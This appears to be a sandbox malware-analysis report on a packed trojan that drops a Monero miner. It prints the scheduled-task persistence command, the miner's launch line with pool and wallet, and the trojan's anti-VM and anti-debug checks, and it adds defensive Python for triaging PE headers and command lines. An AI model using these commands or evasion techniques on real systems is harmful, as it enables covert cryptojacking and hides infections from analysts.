Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe'
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe' Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32 Jump to behavior
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static file information: File size 2817248 > 1048576
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x2a7200
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278594567.00000000002F0000.00000040.00020000.sdmp, zmql3v0y.exe, 00000006.00000002.520873342.0000000000B40000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000F.00000002.319896827.0000000000D90000.00000040.00020000.sdmp
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.6.dr

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Unpacked PE file: 0.2.SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe.2e0000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Unpacked PE file: 6.2.zmql3v0y.exe.b30000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Unpacked PE file: 15.2.RantimeBroker.exe.d80000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Binary contains a suspicious time stamp
Source: initial sample Static PE information: 0xEEB543EE [Tue Nov 27 12:13:34 2096 UTC]
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .boot
PE file contains an invalid checksum
Source: zmql3v0y.exe.0.dr Static PE information: real checksum: 0x280d9c should be: 0x285c9a
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: real checksum: 0x2b2b3a should be: 0x2b9e3b
Source: RantimeBroker.exe.6.dr Static PE information: real checksum: 0x280d9c should be: 0x285c9a
PE file contains sections with non-standard names
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name: (empty; 3 entries)
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name: .themida
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name: .boot
Source: pg2bsuqa.exe.0.dr Static PE information: section name: (empty; 3 entries)
Source: pg2bsuqa.exe.0.dr Static PE information: section name: .apk0
Source: pg2bsuqa.exe.0.dr Static PE information: section name: .themida
Source: pg2bsuqa.exe.0.dr Static PE information: section name: .boot
Source: pg2bsuqa.exe.0.dr Static PE information: section name: .apk1
Source: pg2bsuqa.exe.0.dr Static PE information: section name: .apk2
Source: zmql3v0y.exe.0.dr Static PE information: section name: (empty; 3 entries)
Source: zmql3v0y.exe.0.dr Static PE information: section name: .themida
Source: zmql3v0y.exe.0.dr Static PE information: section name: .boot
Source: RantimeBroker.exe.6.dr Static PE information: section name: (empty; 3 entries)
Source: RantimeBroker.exe.6.dr Static PE information: section name: .themida
Source: RantimeBroker.exe.6.dr Static PE information: section name: .boot
Source: cpu.exe.6.dr Static PE information: section name: _RANDOMX
Source: cpu.exe.6.dr Static PE information: section name: _SHA3_25
Source: cpu.exe.6.dr Static PE information: section name: _TEXT_CN (2 entries)
Source: cpu.exe.6.dr Static PE information: section name: _RDATA
Source: cpu.exe.6.dr Static PE information: section name: 0
Source: cpu.exe.6.dr Static PE information: section name: 1
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Code function: 4_2_003D8570 push ecx; ret 4_2_003D8585
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Code function: 15_2_03CA0007 push es; retf 0003h 15_2_03CA001E
Source: initial sample Static PE information: section name: (empty) entropy: 7.58163620158
Source: initial sample Static PE information: section name: (empty) entropy: 7.89210158409 (2 entries)
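The static findings in this section (a timestamp in 2096, a CheckSum field that does not match the image, an entry point in .boot instead of .text, Themida's blank and .themida/.boot section names, sections with entropy close to 8.0) are all readable from the PE headers with a few lines of parsing. The following is an added example written for this report, not Joe Sandbox output and not code from the sample. It uses only the Python standard library; build_sample_pe() constructs a small PE32 that reproduces those anomalies (with the report's 0xEEB543EE timestamp) and is not the analysed file. The COMMON_SECTIONS and ENTRY_SECTIONS lists and the 7.0 entropy cut-off are this example's assumptions.

```python
"""Static PE triage reproducing the report's timestamp, checksum, entry-point,
section-name and entropy checks.  Added example, stdlib only; the PE it builds
is constructed here and is NOT the analysed sample."""
import math
import struct
import time

# Names a normal MSVC/MinGW/.NET build emits (assumed list); anything else is reported.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc", ".reloc", ".bss",
                   ".tls", ".pdata", ".xdata", ".CRT", ".textbss", "CODE", "DATA", "BSS"}
ENTRY_SECTIONS = {".text", "CODE"}   # where an unpacked entry point normally lives (assumed)


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: ~8.0 means packed/encrypted data, plain x86 code sits around 6."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Recompute the header checksum the way imagehlp!CheckSumMappedFile does:
    ones'-complement sum of all 16-bit words, the stored CheckSum field subtracted
    back out with end-around borrow, plus the file length."""
    padded = data + b"\0" if len(data) & 1 else data
    total = 0
    for (word,) in struct.iter_unpack("<H", padded):
        total += word
        if total > 0xFFFF:
            total = (total & 0xFFFF) + (total >> 16)
    total = ((total & 0xFFFF) + (total >> 16)) & 0xFFFF
    stored = struct.unpack_from("<I", data, checksum_offset)[0]
    for part in (stored & 0xFFFF, stored >> 16):
        total = total - part if total >= part else ((total - part) & 0xFFFF) - 1
    return total + len(data)


def triage_pe(data: bytes, now=None) -> dict:
    """Parse the headers and return findings of the kind the report lists."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, timestamp, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]              # 0x10B = PE32, 0x20B = PE32+
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]     # AddressOfEntryPoint
    stored_checksum = struct.unpack_from("<I", data, opt + 64)[0]
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "rawsize": rawsize,
                         "entropy": round(shannon_entropy(data[rawptr:rawptr + rawsize]), 3)})
    entry = next((s for s in sections if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"])), None)
    computed = pe_checksum(data, opt + 64)
    now = time.time() if now is None else now
    return {
        "is_32bit": magic == 0x10B,
        "timestamp": timestamp,
        "timestamp_in_future": timestamp > now + 86400,   # linked 'tomorrow' or later: forged
        "section_count": nsections, "too_many_sections": nsections > 10,
        "entry_section": entry["name"] if entry else None,
        "entry_outside_code": entry is None or entry["name"] not in ENTRY_SECTIONS,
        "stored_checksum": stored_checksum, "computed_checksum": computed,
        "checksum_ok": stored_checksum == computed,       # 0 means 'never set'; still a mismatch
        "nonstandard_sections": [s["name"] for s in sections if s["name"] not in COMMON_SECTIONS],
        "high_entropy_sections": [s["name"] for s in sections if s["entropy"] > 7.0],
        "sections": sections,
    }


def build_sample_pe(timestamp: int = 0xEEB543EE) -> bytes:
    """Constructed PE32 with three 0x200-byte sections: '.text' (mostly zeros),
    '.themida' (uniform bytes => entropy 8.0) and '.boot' holding the entry point."""
    sect_align, file_align, headers_size = 0x1000, 0x200, 0x200   # 0x138 bytes of headers, rounded up
    sections = [(b".text", b"\0" * 0x1F0 + b"\xC3" * 0x10, 0x60000020),
                (b".themida", bytes(range(256)) * 2, 0xE0000020),
                (b".boot", b"\0" * 0x10 + bytes(range(0x80)) * 2 + b"\0" * 0xF0, 0x60000020)]
    entry_rva = sect_align * 3 + 0x10                       # 0x3010: inside the third section
    dos = bytearray(0x40); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0, 0x200, 0x400, 0, entry_rva, 0x1000, 0x2000, 0x400000,
                      sect_align, file_align, 6, 0, 0, 0, 6, 0, 0, sect_align * 4, headers_size,
                      0,                                    # CheckSum left at zero, as in the dropped files
                      2, 0x8140, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    hdrs, body = b"", b""
    for i, (name, content, flags) in enumerate(sections):
        hdrs += struct.pack("<8sIIIIIIHHI", name, len(content), sect_align * (i + 1),
                            len(content), headers_size + file_align * i, 0, 0, 0, 0, flags)
        body += content
    image = dos + b"PE\0\0" + coff + opt + hdrs
    return bytes(image) + b"\0" * (headers_size - len(image)) + body


if __name__ == "__main__":
    for key, value in triage_pe(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Run triage_pe() over the bytes of a real dropped file to get the same fields the report prints; the entropy and entry-point checks are what make a Themida-style layout stand out even when the section names have been blanked.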

Persistence and Installation Behavior:

Sample is not signed and drops a device driver
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File created: C:\Users\user\AppData\Local\zmql3v0y.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File created: C:\Users\user\AppData\Local\pg2bsuqa.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
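The schtasks line above and the cpu.exe launch listed under the process-creation entries carry the whole persistence and monetisation story: a task with a Microsoft-sounding name re-launches RantimeBroker.exe from %AppData% every minute, and cpu.exe is started with xmrig-style arguments naming the Stratum pool, the 95-character Monero payout address and the donate level. The parser below is an added example written for this report, not sandbox or sample code. It turns such command lines (SAMPLE_CMDLINES is constructed from the report's entries, plus one benign-looking control task) into structured indicators; the red-flag thresholds (re-launch interval of five minutes or less, user-writable paths, vendor-lookalike task names) and the control command line are this example's assumptions.

```python
"""Turn the report's key command lines (schtasks persistence, xmrig-style miner
launch) into structured indicators.  Added example, not sandbox or sample code;
SAMPLE_CMDLINES is constructed from the report's process-creation entries."""
import re
from urllib.parse import urlsplit

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
INTERVAL_SECONDS = {"MINUTE": 60, "HOURLY": 3600, "DAILY": 86400}
HIGH_FREQUENCY_S = 300          # assumed threshold: a task re-run every <= 5 min is a red flag
# Monero main-net standard address: 95 base58 chars (no 0 O I l), '4' prefix ('8' = subaddress).
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")


def tokenize(cmdline: str) -> list:
    """Whitespace split honouring '...'/"..." (Joe Sandbox prints " as '); no backslash
    escapes, so Windows paths survive intact."""
    tokens, cur, quote = [], [], None
    for ch in cmdline:
        if quote and ch == quote:
            quote = None
        elif quote or not (ch.isspace() or ch in "'\""):
            cur.append(ch)
        elif ch in "'\"":
            quote = ch
        elif cur:
            tokens.append("".join(cur)); cur = []
    return tokens + ["".join(cur)] if cur else tokens


def parse_schtasks(cmdline: str):
    """None unless this is 'schtasks /create'; else task parameters plus red flags."""
    toks = tokenize(cmdline)
    if not toks or not toks[0].lower().endswith("schtasks.exe"):
        return None
    opts, i = {}, 1
    while i < len(toks):            # /sc /mo /tn /tr /ru /st take a value; the rest are switches
        key = toks[i].lower().lstrip("/")
        if key in ("sc", "mo", "tn", "tr", "ru", "st") and i + 1 < len(toks):
            opts[key], i = toks[i + 1], i + 2
        else:
            opts[key], i = True, i + 1
    if "create" not in opts:
        return None
    schedule = opts.get("sc", "").upper()
    every, modifier = INTERVAL_SECONDS.get(schedule), opts.get("mo", "1")
    if every and isinstance(modifier, str) and modifier.isdigit():
        every *= int(modifier)
    name, action = opts.get("tn") or "", opts.get("tr") or ""
    checks = {
        "runs_from_user_writable_path": any(p in action.lower() for p in USER_WRITABLE),
        "high_frequency": every is not None and every <= HIGH_FREQUENCY_S,
        "vendor_lookalike_name": "microsoft" in name.lower(),
        "overwrites_existing": opts.get("f") is True,
    }
    return {"task": name, "schedule": schedule, "interval_s": every, "action": action,
            "flags": [k for k, hit in checks.items() if hit]}


def parse_miner(cmdline: str):
    """None unless the command line carries a stratum pool URL; else pool/wallet/algo."""
    toks, opts = tokenize(cmdline), {}
    for i, t in enumerate(toks):
        if t.startswith("--") and "=" in t:                       # --donate-level=1
            k, v = t[2:].split("=", 1); opts[k] = v
        elif t.startswith("-") and i + 1 < len(toks) and not toks[i + 1].startswith("-"):
            opts[t.lstrip("-")] = toks[i + 1]                      # -o URL, --algo cn/r, -u WALLET
    url = opts.get("o") or opts.get("url") or ""
    if not url.startswith("stratum"):
        return None
    parts = urlsplit(url)
    wallet, _, worker = (opts.get("u") or opts.get("user") or "").partition(".")  # wallet.worker
    return {"scheme": parts.scheme, "pool_host": parts.hostname, "pool_port": parts.port,
            "wallet": wallet, "worker": worker or None, "wallet_is_monero": bool(MONERO_ADDR.match(wallet)),
            "algo": opts.get("algo") or opts.get("a"), "donate_level": opts.get("donate-level")}


def triage_cmdlines(cmdlines):
    """List of (kind, indicators) for every command line that parses as persistence or mining."""
    out = []
    for c in cmdlines:
        for kind, parser in (("persistence", parse_schtasks), ("cryptominer", parse_miner)):
            hit = parser(c)
            if hit:
                out.append((kind, hit))
    return out


SAMPLE_CMDLINES = [   # constructed from the report's entries; the third is a benign-looking control
    r"'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f",
    r"'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1",
    r"'C:\Windows\System32\schtasks.exe' /create /sc DAILY /tn 'Adobe Acrobat Update Task' /tr 'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe'",
]

if __name__ == "__main__":
    for kind, info in triage_cmdlines(SAMPLE_CMDLINES):
        print(kind, info)
```

Splitting the user field on "." follows the wallet.worker convention Monero pools accept; in the report the worker part is just "/". The same functions work on process-creation telemetry (Sysmon event 1, EDR command-line fields) once the quoting has been normalised the way tokenize() expects.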

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX (38 identical entries) Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX (42 identical entries) Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX (43 identical entries) Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process information set: NOOPENFILEERRORBOX (8 identical entries) Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\zmql3v0y.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (3 queries)
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\zmql3v0y.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe RDTSC instruction interceptor: First address: 000000000176B6D7 second address: 000000000176B6E3 instructions: 0x00000000 rdtsc 0x00000002 movzx edx, ax 0x00000005 bts edx, edx 0x00000008 xor bl, cl 0x0000000a rcl dl, cl 0x0000000c rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Thread delayed: delay time: 922337203685477
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe TID: 5440 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe TID: 4920 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe TID: 6660 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285098364.0000000006360000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_
Source: RantimeBroker.exe, 0000000F.00000003.317125414.00000000015F0000.00000004.00000001.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: cpu.exe, 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: RantimeBroker.exe, 0000000F.00000003.317400847.00000000015F0000.00000004.00000001.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RantimeBroker.exe, 0000000F.00000003.316725149.00000000015F0000.00000004.00000001.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
Source: RantimeBroker.exe, 0000000F.00000003.316864876.00000000015F0000.00000004.00000001.sdmp Binary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
Source: cpu.exe, 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW0@5
Source: RantimeBroker.exe, 0000000F.00000003.317206080.00000000015F0000.00000004.00000001.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
Source: cpu.exe, 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWuX
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe System information queried: ModuleInformation
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Process queried: DebugObjectHandle
Enables debug privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe'
